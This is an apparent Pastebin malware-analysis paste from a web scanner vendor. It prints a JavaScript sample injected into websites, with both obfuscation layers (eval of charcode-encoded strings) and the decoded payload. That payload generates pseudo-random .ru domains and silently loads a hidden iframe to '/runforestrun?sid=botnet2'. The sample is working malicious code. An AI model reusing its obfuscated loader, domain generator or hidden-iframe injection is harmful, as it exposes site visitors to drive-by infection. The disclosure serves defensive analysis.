SHARE
TWEET

Quttera web malware scanner detected malicious JavaScript

a guest Jul 29th, 2013 56 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  * Quttera web malware scanner detected malicious JavaScript code injecting hidden iframes to
  3.  * multiple domains in *.ru area
  4.  */
  5.  
  6. /*
  7.  * first obfuscation level
  8.  */
  9. /*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,11 ... 8,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));/*qhk6sa6g1c*/
  10.  
  11. /*
  12.  * second obfuscation level
  13.  */
  14. try {
  15.     prototype % 2;
  16. } catch (asd) {
  17.     x = 2;
  18. }
  19. try {
  20.     q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
  21.     q.appendChild(q + "");
  22. } catch (fwbewe) {
  23.     i = 0;
  24.     try {
  25.         prototype * 5;
  26.     } catch (z) {
  27.         fr = "fromChar";
  28.         f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 222, 160, 696, 520, 630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 696, 505, 690, 580, 192, 305, 192, 580, 624, 525, 690, 230, 390, 160, 252, 160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230, 492, 160, 252, 160, 624, 525, 354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160, 372, 160, 288, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750, 160, 606, 540, 690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 580, 606, 575, 696, 160, 258, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 200, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 252, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 205, 354, 50, 750, 50, 60, 510, 702, 550, 594, 580, 630, 555, 660, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 500, 192, 305, 192, 550, 606, 595, 192, 340, 582, 580, 606, 200, 702, 550, 630, 600, 252, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 160, 366, 160, 600, 230, 618, 505, 696, 360, 666, 585, 684, 575, 240, 205, 192, 310, 192, 245, 300, 160, 378, 160, 294, 160, 348, 160, 288, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 250, 306, 260, 318, 270, 330, 280, 342, 240, 294, 160, 258, 160, 240, 500, 276, 515, 606, 580, 462, 555, 660, 580, 624, 200, 246, 160, 252, 160, 288, 600, 420, 350, 420, 350, 420, 350, 246, 160, 258, 160, 240, 500, 276, 515, 606, 580, 408, 485, 696, 505, 240, 205, 192, 210, 192, 240, 720, 350, 420, 350, 420, 205, 258, 160, 240, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 690, 160, 252, 160, 288, 600, 420, 350, 420, 205, 246, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 390, 160, 366, 160, 312, 280, 300, 275, 294, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 462, 160, 366, 160, 300, 245, 312, 275, 312, 280, 306, 270, 312, 275, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 405, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 282, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 410, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 222, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 160, 366, 160, 294, 230, 288, 160, 282, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 550, 606, 600, 696, 160, 366, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 354, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 580, 624, 525, 690, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 495, 684, 505, 582, 580, 606, 410, 582, 550, 600, 555, 654, 390, 702, 545, 588, 505, 684, 200, 684, 220, 192, 385, 630, 550, 264, 160, 462, 485, 720, 205, 738, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 240, 385, 582, 600, 270, 385, 630, 550, 246, 160, 252, 160, 684, 230, 660, 505, 720, 580, 240, 205, 192, 215, 192, 385, 630, 550, 246, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 648, 505, 660, 515, 696, 520, 264, 160, 732, 555, 660, 505, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 570, 582, 550, 600, 160, 366, 160, 660, 505, 714, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 606, 580, 696, 505, 684, 575, 192, 305, 192, 455, 234, 485, 234, 220, 234, 490, 234, 220, 234, 495, 234, 220, 234, 500, 234, 220, 234, 505, 234, 220, 234, 510, 234, 220, 234, 515, 234, 220, 234, 520, 234, 220, 234, 525, 234, 220, 234, 530, 234, 220, 234, 535, 234, 220, 234, 540, 234, 220, 234, 545, 234, 220, 234, 550, 234, 220, 234, 555, 234, 220, 234, 560, 234, 220, 234, 565, 234, 220, 234, 570, 234, 220, 234, 575, 234, 220, 234, 580, 234, 220, 234, 585, 234, 220, 234, 590, 234, 220, 234, 595, 234, 220, 234, 600, 234, 220, 234, 605, 234, 220, 234, 610, 234, 465, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 580, 684, 160, 366, 160, 234, 195, 354, 50, 192, 160, 192, 160, 612, 555, 684, 200, 708, 485, 684, 160, 630, 160, 366, 160, 288, 295, 192, 525, 192, 300, 192, 540, 606, 550, 618, 580, 624, 295, 192, 525, 192, 215, 258, 160, 246, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 575, 696, 570, 192, 215, 366, 160, 648, 505, 696, 580, 606, 570, 690, 455, 594, 570, 606, 485, 696, 505, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 570, 582, 550, 600, 220, 192, 240, 264, 160, 648, 505, 696, 580, 606, 570, 690, 230, 648, 505, 660, 515, 696, 520, 192, 225, 192, 245, 246, 465, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 575, 696, 570, 192, 215, 192, 195, 276, 195, 192, 215, 192, 610, 666, 550, 606, 295, 60, 625, 60, 50, 690, 505, 696, 420, 630, 545, 606, 555, 702, 580, 240, 510, 702, 550, 594, 580, 630, 555, 660, 200, 246, 615, 60, 160, 192, 160, 192, 580, 684, 605, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 240, 580, 726, 560, 606, 555, 612, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 366, 160, 204, 585, 660, 500, 606, 510, 630, 550, 606, 500, 204, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 192, 580, 684, 585, 606, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 590, 582, 570, 192, 585, 660, 525, 720, 160, 366, 160, 462, 485, 696, 520, 276, 570, 666, 585, 660, 500, 240, 215, 660, 505, 714, 160, 408, 485, 696, 505, 240, 205, 282, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 708, 485, 684, 160, 600, 555, 654, 485, 630, 550, 468, 485, 654, 505, 192, 305, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 294, 270, 264, 160, 234, 570, 702, 195, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 160, 366, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 495, 684, 505, 582, 580, 606, 345, 648, 505, 654, 505, 660, 580, 240, 170, 438, 350, 492, 325, 462, 345, 204, 205, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 505, 696, 325, 696, 580, 684, 525, 588, 585, 696, 505, 240, 170, 690, 570, 594, 170, 264, 160, 204, 520, 696, 580, 672, 290, 282, 235, 204, 215, 600, 555, 654, 485, 630, 550, 468, 485, 654, 505, 258, 170, 282, 570, 702, 550, 612, 555, 684, 505, 690, 580, 684, 585, 660, 315, 690, 525, 600, 305, 588, 555, 696, 550, 606, 580, 300, 170, 246, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 545, 276, 575, 696, 605, 648, 505, 276, 595, 630, 500, 696, 520, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 624, 505, 630, 515, 624, 580, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 708, 525, 690, 525, 588, 525, 648, 525, 696, 605, 192, 305, 192, 170, 624, 525, 600, 500, 606, 550, 204, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205, 354];
  29.         v = "eva";
  30.     }
  31.     if (v) e = window[v + "l"];
  32.     w = f;
  33.     s = [];
  34.     r = String;
  35.     z = ((e) ? "Code" : "");
  36.     for (; 1776 - 5 + 5 > i; i += 1) {
  37.         j = i;
  38.         if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
  39.     }
  40.     if (f) e(s);
  41. }
  42.  
  43.  
  44.  
  45. /*
  46.  * decoded payload generate hidden iframes to "/runforestrun?sid=botnet2" query string
  47.  * in random domains in *.ru area
  48.  */
  49. function nextRandomNumber(){
  50.     var hi = this.seed / this.Q;
  51.     var lo = this.seed % this.Q;
  52.     var test = this.A * lo - this.R * hi;
  53.     if(test > 0){
  54.         this.seed = test;
  55.     } else {
  56.         this.seed = test + this.M;
  57.     }
  58.     return (this.seed * this.oneOverM);
  59. }
  60.  
  61. function RandomNumberGenerator(unix){
  62.     var d = new Date(unix*1000);
  63.     var s = d.getHours() > 12 ? 1 : 0;
  64.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
  65.     this.A = 48271;
  66.     this.M = 2147483647;
  67.     this.Q = this.M / this.A;
  68.     this.R = this.M % this.A;
  69.     this.oneOverM = 1.0 / this.M;
  70.     this.next = nextRandomNumber;
  71.     return this;
  72. }
  73.  
  74. function createRandomNumber(r, Min, Max){
  75.     return Math.round((Max-Min) * r.next() + Min);
  76. }
  77.  
  78. function generatePseudoRandomString(unix, length, zone){
  79.     var rand = new RandomNumberGenerator(unix);
  80.     var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
  81.     var str = '';
  82.     for(var i = 0; i < length; i ++ ){
  83.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  84.     }
  85.     return str + '.' + zone;
  86. }
  87.  
  88. setTimeout(function(){
  89.     try{
  90.         if(typeof iframeWasCreated == "undefined"){
  91.             iframeWasCreated = true;
  92.             var unix = Math.round(+new Date()/1000);
  93.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
  94.             ifrm = document.createElement("IFRAME");
  95.             ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");
  96.             ifrm.style.width = "0px";
  97.             ifrm.style.height = "0px";
  98.             ifrm.style.visibility = "hidden";
  99.             document.body.appendChild(ifrm);
  100.         }
  101.     }catch(e){}
  102. }, 500);
RAW Paste Data
Top